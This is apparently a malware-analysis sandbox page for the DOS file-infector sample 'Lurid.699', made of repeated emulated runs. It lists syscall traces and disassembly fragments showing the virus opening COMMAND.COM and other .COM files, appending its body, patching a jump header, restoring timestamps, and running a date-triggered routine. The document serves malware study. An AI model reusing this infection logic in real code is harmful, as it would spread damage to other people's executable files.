Sample viewer

vx.netlux.org/Virus.DOS.Lurid.699

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:00:23.024084709Z 37 PC: 12be2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:00:23.025220704Z 26 PC: 12bf8 | Set disk transfer address
2018-12-17T22:00:23.025987812Z 67 PC: 12c26 | Get or set file attributes
2018-12-17T22:00:23.029182243Z 67 PC: 12c34 | Get or set file attributes
2018-12-17T22:00:23.365133905Z 61 PC: 12c39 | Open file (Filename = 'c:\command.com')
2018-12-17T22:00:23.371247014Z 87 PC: 12c3f | Get or set file date and time
2018-12-17T22:00:23.372507767Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-17T22:00:23.37453448Z 66 PC: 12c63 | Move file pointer
2018-12-17T22:00:23.376145684Z 66 PC: 12c74 | Move file pointer
2018-12-17T22:00:23.377512468Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:00:23.37994873Z 66 PC: 12c88 | Move file pointer
2018-12-17T22:00:23.381747875Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-17T22:00:23.385940218Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-17T22:00:23.395211552Z 66 PC: 12cc5 | Move file pointer
2018-12-17T22:00:23.405498786Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:00:23.40839761Z 87 PC: 12cd7 | Get or set file date and time
2018-12-17T22:00:23.409901766Z 62 PC: 12cdb | Close file
2018-12-17T22:00:23.417561518Z 78 PC: 12c10 | Find first file
2018-12-17T22:00:23.423379983Z 47 PC: 12c1c | Get disk transfer address
2018-12-17T22:00:23.424735978Z 67 PC: 12c26 | Get or set file attributes
2018-12-17T22:00:23.431007454Z 67 PC: 12c34 | Get or set file attributes
2018-12-17T22:00:23.446082329Z 61 PC: 12c39 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:00:23.452420206Z 87 PC: 12c3f | Get or set file date and time
2018-12-17T22:00:23.454305852Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-17T22:00:23.456289097Z 66 PC: 12c63 | Move file pointer
2018-12-17T22:00:23.457581176Z 66 PC: 12c74 | Move file pointer
2018-12-17T22:00:23.460403551Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:00:23.467256305Z 66 PC: 12c88 | Move file pointer
2018-12-17T22:00:23.468986232Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-17T22:00:23.473585906Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-17T22:00:23.48191933Z 66 PC: 12cc5 | Move file pointer
2018-12-17T22:00:23.483212105Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:00:23.490440577Z 87 PC: 12cd7 | Get or set file date and time
2018-12-17T22:00:23.492149478Z 62 PC: 12cdb | Close file
2018-12-17T22:00:23.498164531Z 26 PC: 12cee | Set disk transfer address
2018-12-17T22:00:23.499766669Z 47 PC: 12cf2 | Get disk transfer address
2018-12-17T22:00:23.501587279Z 67 PC: 12d01 | Get or set file attributes
2018-12-17T22:00:23.506366113Z 79 PC: 12d05 | Find next file
2018-12-17T22:00:23.5090276Z 42 PC: 12d0c | Get date 0x12d0c: cmp al, 1
0x12d0e: jne 0x12d34
0x12d10: mov ah, 0x2c
0x12d12: int 0x21
0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
2018-12-17T22:00:23.511327007Z 44 PC: 12d14 | Get time 0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
0x12d3d: mov cx, 3
0x12d40: repne movsb byte ptr es:[di], byte ptr [si]
0x12d42: cld
0x12d43: lea si, word ptr [bp + 0x21c]
2018-12-17T22:00:23.51352551Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1156,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.013626442Z 37 PC: 12be2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:42:59.01572805Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T11:42:59.016765445Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T11:42:59.021757381Z 67 PC: 12c34 | Get or set file attributes
2018-12-25T11:43:01.171202548Z 61 PC: 12c39 | Open file (Filename = 'c:\command.com')
2018-12-25T11:43:01.177158795Z 87 PC: 12c3f | Get or set file date and time
2018-12-25T11:43:01.179169867Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-25T11:43:01.181630327Z 66 PC: 12c63 | Move file pointer
2018-12-25T11:43:01.184476022Z 66 PC: 12c74 | Move file pointer
2018-12-25T11:43:01.186219404Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:01.189060935Z 66 PC: 12c88 | Move file pointer
2018-12-25T11:43:01.193185955Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-25T11:43:01.197204501Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-25T11:43:01.20668548Z 66 PC: 12cc5 | Move file pointer
2018-12-25T11:43:01.208796869Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:01.212597027Z 87 PC: 12cd7 | Get or set file date and time
2018-12-25T11:43:01.214094591Z 62 PC: 12cdb | Close file
2018-12-25T11:43:01.230640846Z 78 PC: 12c10 | Find first file
2018-12-25T11:43:01.237077073Z 47 PC: 12c1c | Get disk transfer address
2018-12-25T11:43:01.23853375Z 67 PC: 12c26 | Get or set file attributes (See above)
2018-12-25T11:43:01.245530248Z 67 PC: 12c34 | Get or set file attributes (See above)
2018-12-25T11:43:01.263014181Z 61 PC: 12c39 | Open file (See above)
2018-12-25T11:43:01.271620156Z 87 PC: 12c3f | Get or set file date and time (See above)
2018-12-25T11:43:01.273649662Z 44 PC: 12c55 | Get time (See above)
2018-12-25T11:43:01.275792278Z 66 PC: 12c63 | Move file pointer (See above)
2018-12-25T11:43:01.27715256Z 66 PC: 12c74 | Move file pointer (See above)
2018-12-25T11:43:01.279466347Z 63 PC: 12c7f | Read file or device (See above)
2018-12-25T11:43:01.286951449Z 66 PC: 12c88 | Move file pointer (See above)
2018-12-25T11:43:01.288767632Z 64 PC: 12c96 | Write file or device (See above)
2018-12-25T11:43:01.292941532Z 64 PC: 12cbc | Write file or device (See above)
2018-12-25T11:43:01.308877135Z 66 PC: 12cc5 | Move file pointer (See above)
2018-12-25T11:43:01.316447858Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T11:43:01.323703282Z 87 PC: 12cd7 | Get or set file date and time (See above)
2018-12-25T11:43:01.325634995Z 62 PC: 12cdb | Close file (See above)
2018-12-25T11:43:01.333443638Z 26 PC: 12cee | Set disk transfer address
2018-12-25T11:43:01.334570449Z 47 PC: 12cf2 | Get disk transfer address
2018-12-25T11:43:01.336524684Z 67 PC: 12d01 | Get or set file attributes
2018-12-25T11:43:01.34185367Z 79 PC: 12d05 | Find next file
2018-12-25T11:43:01.34385368Z 42 PC: 12d0c | Get date 0x12d0c: cmp al, 1
0x12d0e: jne 0x12d34
0x12d10: mov ah, 0x2c
0x12d12: int 0x21
0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
2018-12-25T11:43:01.348466912Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1156,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.120053415Z 37 PC: 12be2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:42:59.122047916Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T11:42:59.123586393Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T11:42:59.127233303Z 67 PC: 12c34 | Get or set file attributes
2018-12-25T11:42:59.814910218Z 61 PC: 12c39 | Open file (Filename = 'c:\command.com')
2018-12-25T11:42:59.822797381Z 87 PC: 12c3f | Get or set file date and time
2018-12-25T11:42:59.824597947Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-25T11:42:59.830392096Z 66 PC: 12c63 | Move file pointer
2018-12-25T11:42:59.833401418Z 66 PC: 12c74 | Move file pointer
2018-12-25T11:42:59.834810448Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:42:59.838220639Z 66 PC: 12c88 | Move file pointer
2018-12-25T11:42:59.840759684Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-25T11:42:59.846419092Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-25T11:42:59.857366646Z 66 PC: 12cc5 | Move file pointer
2018-12-25T11:42:59.859065398Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:42:59.863430191Z 87 PC: 12cd7 | Get or set file date and time
2018-12-25T11:42:59.865114513Z 62 PC: 12cdb | Close file
2018-12-25T11:42:59.872991699Z 78 PC: 12c10 | Find first file
2018-12-25T11:42:59.880378714Z 47 PC: 12c1c | Get disk transfer address
2018-12-25T11:42:59.881610558Z 67 PC: 12c26 | Get or set file attributes (See above)
2018-12-25T11:42:59.888237398Z 67 PC: 12c34 | Get or set file attributes (See above)
2018-12-25T11:42:59.906810527Z 61 PC: 12c39 | Open file (See above)
2018-12-25T11:42:59.915855677Z 87 PC: 12c3f | Get or set file date and time (See above)
2018-12-25T11:42:59.917511792Z 44 PC: 12c55 | Get time (See above)
2018-12-25T11:42:59.921322997Z 66 PC: 12c63 | Move file pointer (See above)
2018-12-25T11:42:59.923410029Z 66 PC: 12c74 | Move file pointer (See above)
2018-12-25T11:42:59.925360142Z 63 PC: 12c7f | Read file or device (See above)
2018-12-25T11:42:59.933654804Z 66 PC: 12c88 | Move file pointer (See above)
2018-12-25T11:42:59.935929458Z 64 PC: 12c96 | Write file or device (See above)
2018-12-25T11:42:59.939967271Z 64 PC: 12cbc | Write file or device (See above)
2018-12-25T11:42:59.960144654Z 66 PC: 12cc5 | Move file pointer (See above)
2018-12-25T11:42:59.962874303Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T11:42:59.973499652Z 87 PC: 12cd7 | Get or set file date and time (See above)
2018-12-25T11:42:59.975620793Z 62 PC: 12cdb | Close file (See above)
2018-12-25T11:42:59.985687575Z 26 PC: 12cee | Set disk transfer address
2018-12-25T11:42:59.987123242Z 47 PC: 12cf2 | Get disk transfer address
2018-12-25T11:42:59.988819913Z 67 PC: 12d01 | Get or set file attributes
2018-12-25T11:42:59.994961578Z 79 PC: 12d05 | Find next file
2018-12-25T11:42:59.996793344Z 42 PC: 12d0c | Get date 0x12d0c: cmp al, 1
0x12d0e: jne 0x12d34
0x12d10: mov ah, 0x2c
0x12d12: int 0x21
0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
2018-12-25T11:42:59.999283384Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":1156,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.10332714Z 37 PC: 12be2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:42:59.104828884Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T11:42:59.105916015Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T11:42:59.111037094Z 67 PC: 12c34 | Get or set file attributes
2018-12-25T11:43:01.171254184Z 61 PC: 12c39 | Open file (Filename = 'c:\command.com')
2018-12-25T11:43:01.178703545Z 87 PC: 12c3f | Get or set file date and time
2018-12-25T11:43:01.180538039Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-25T11:43:01.183556018Z 66 PC: 12c63 | Move file pointer
2018-12-25T11:43:01.185297562Z 66 PC: 12c74 | Move file pointer
2018-12-25T11:43:01.186969757Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:01.190018292Z 66 PC: 12c88 | Move file pointer
2018-12-25T11:43:01.192535696Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-25T11:43:01.196299789Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-25T11:43:01.206766053Z 66 PC: 12cc5 | Move file pointer
2018-12-25T11:43:01.209612024Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:43:01.212402341Z 87 PC: 12cd7 | Get or set file date and time
2018-12-25T11:43:01.213865054Z 62 PC: 12cdb | Close file
2018-12-25T11:43:01.221690975Z 78 PC: 12c10 | Find first file
2018-12-25T11:43:01.22760548Z 47 PC: 12c1c | Get disk transfer address
2018-12-25T11:43:01.228719548Z 67 PC: 12c26 | Get or set file attributes (See above)
2018-12-25T11:43:01.234654978Z 67 PC: 12c34 | Get or set file attributes (See above)
2018-12-25T11:43:01.253623906Z 61 PC: 12c39 | Open file (See above)
2018-12-25T11:43:01.260653125Z 87 PC: 12c3f | Get or set file date and time (See above)
2018-12-25T11:43:01.262679489Z 44 PC: 12c55 | Get time (See above)
2018-12-25T11:43:01.267159282Z 66 PC: 12c63 | Move file pointer (See above)
2018-12-25T11:43:01.268571229Z 66 PC: 12c74 | Move file pointer (See above)
2018-12-25T11:43:01.272086264Z 63 PC: 12c7f | Read file or device (See above)
2018-12-25T11:43:01.282978796Z 66 PC: 12c88 | Move file pointer (See above)
2018-12-25T11:43:01.284374142Z 64 PC: 12c96 | Write file or device (See above)
2018-12-25T11:43:01.288495494Z 64 PC: 12cbc | Write file or device (See above)
2018-12-25T11:43:01.297043084Z 66 PC: 12cc5 | Move file pointer (See above)
2018-12-25T11:43:01.298707208Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T11:43:01.305670985Z 87 PC: 12cd7 | Get or set file date and time (See above)
2018-12-25T11:43:01.307823087Z 62 PC: 12cdb | Close file (See above)
2018-12-25T11:43:01.315157433Z 26 PC: 12cee | Set disk transfer address
2018-12-25T11:43:01.316159171Z 47 PC: 12cf2 | Get disk transfer address
2018-12-25T11:43:01.318327088Z 67 PC: 12d01 | Get or set file attributes
2018-12-25T11:43:01.322946843Z 79 PC: 12d05 | Find next file
2018-12-25T11:43:01.324889947Z 42 PC: 12d0c | Get date 0x12d0c: cmp al, 1
0x12d0e: jne 0x12d34
0x12d10: mov ah, 0x2c
0x12d12: int 0x21
0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
2018-12-25T11:43:01.328242961Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":1156,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.136840646Z 37 PC: 12be2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:42:59.138991976Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T11:42:59.140085176Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T11:42:59.146513812Z 67 PC: 12c34 | Get or set file attributes
2018-12-25T11:42:59.815844587Z 61 PC: 12c39 | Open file (Filename = 'c:\command.com')
2018-12-25T11:42:59.830926454Z 87 PC: 12c3f | Get or set file date and time
2018-12-25T11:42:59.835457563Z 44 PC: 12c55 | Get time 0x12c55: mov byte ptr cs:[bp + 0x12a], dl
0x12c5a: mov ax, 0x4202
0x12c5d: xor cx, cx
0x12c5f: xor dx, dx
0x12c61: int 0x21
0x12c63: sub ax, 3
0x12c66: mov word ptr cs:[bp + 0x223], ax
0x12c6b: mov ax, 0x4200
0x12c6e: xor cx, cx
0x12c70: xor dx, dx
0x12c72: int 0x21
0x12c74: mov ah, 0x3f
0x12c76: lea dx, word ptr [bp + 0x21c]
0x12c7a: mov cx, 3
0x12c7d: int 0x21
0x12c7f: mov ax, 0x4202
0x12c82: xor dx, dx
0x12c84: xor cx, cx
0x12c86: int 0x21
0x12c88: mov ah, 0x40
2018-12-25T11:42:59.841356369Z 66 PC: 12c63 | Move file pointer
2018-12-25T11:42:59.847953387Z 66 PC: 12c74 | Move file pointer
2018-12-25T11:42:59.85153325Z 63 PC: 12c7f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:42:59.855228294Z 66 PC: 12c88 | Move file pointer
2018-12-25T11:42:59.858156264Z 64 PC: 12c96 | Write file or device (Write 43 bytes on handle 5)
2018-12-25T11:42:59.863368368Z 64 PC: 12cbc | Write file or device (Write 656 bytes on handle 5)
2018-12-25T11:42:59.87596098Z 66 PC: 12cc5 | Move file pointer
2018-12-25T11:42:59.878500774Z 64 PC: 12cd0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:42:59.881721074Z 87 PC: 12cd7 | Get or set file date and time
2018-12-25T11:42:59.883416879Z 62 PC: 12cdb | Close file
2018-12-25T11:42:59.892813578Z 78 PC: 12c10 | Find first file
2018-12-25T11:42:59.900580024Z 47 PC: 12c1c | Get disk transfer address
2018-12-25T11:42:59.902082666Z 67 PC: 12c26 | Get or set file attributes (See above)
2018-12-25T11:42:59.908811159Z 67 PC: 12c34 | Get or set file attributes (See above)
2018-12-25T11:42:59.929031431Z 61 PC: 12c39 | Open file (See above)
2018-12-25T11:42:59.944007185Z 87 PC: 12c3f | Get or set file date and time (See above)
2018-12-25T11:42:59.946596197Z 44 PC: 12c55 | Get time (See above)
2018-12-25T11:42:59.949826591Z 66 PC: 12c63 | Move file pointer (See above)
2018-12-25T11:42:59.951576453Z 66 PC: 12c74 | Move file pointer (See above)
2018-12-25T11:42:59.953407028Z 63 PC: 12c7f | Read file or device (See above)
2018-12-25T11:42:59.962542745Z 66 PC: 12c88 | Move file pointer (See above)
2018-12-25T11:42:59.964422681Z 64 PC: 12c96 | Write file or device (See above)
2018-12-25T11:42:59.977869436Z 64 PC: 12cbc | Write file or device (See above)
2018-12-25T11:43:00.00436411Z 66 PC: 12cc5 | Move file pointer (See above)
2018-12-25T11:43:00.006083263Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T11:43:00.024434511Z 87 PC: 12cd7 | Get or set file date and time (See above)
2018-12-25T11:43:00.028412036Z 62 PC: 12cdb | Close file (See above)
2018-12-25T11:43:00.051216049Z 26 PC: 12cee | Set disk transfer address
2018-12-25T11:43:00.053451534Z 47 PC: 12cf2 | Get disk transfer address
2018-12-25T11:43:00.054989102Z 67 PC: 12d01 | Get or set file attributes
2018-12-25T11:43:00.058896814Z 79 PC: 12d05 | Find next file
2018-12-25T11:43:00.060969633Z 42 PC: 12d0c | Get date 0x12d0c: cmp al, 1
0x12d0e: jne 0x12d34
0x12d10: mov ah, 0x2c
0x12d12: int 0x21
0x12d14: cmp ch, cl
0x12d16: jne 0x12d34
0x12d18: mov ah, 0x3c
0x12d1a: xor cx, cx
0x12d1c: lea dx, word ptr [bp + 0x146]
0x12d20: int 0x21
0x12d22: xchg ax, bx
0x12d23: mov ah, 0x40
0x12d25: lea dx, word ptr [bp + 0x153]
0x12d29: mov cx, word ptr cs:[bp + 0x21a]
0x12d2e: int 0x21
0x12d30: mov ah, 0x3e
0x12d32: int 0x21
0x12d34: cld
0x12d35: lea si, word ptr [bp + 0x21f]
0x12d39: lea di, word ptr [bp + 0x21c]
2018-12-25T11:43:00.063417584Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')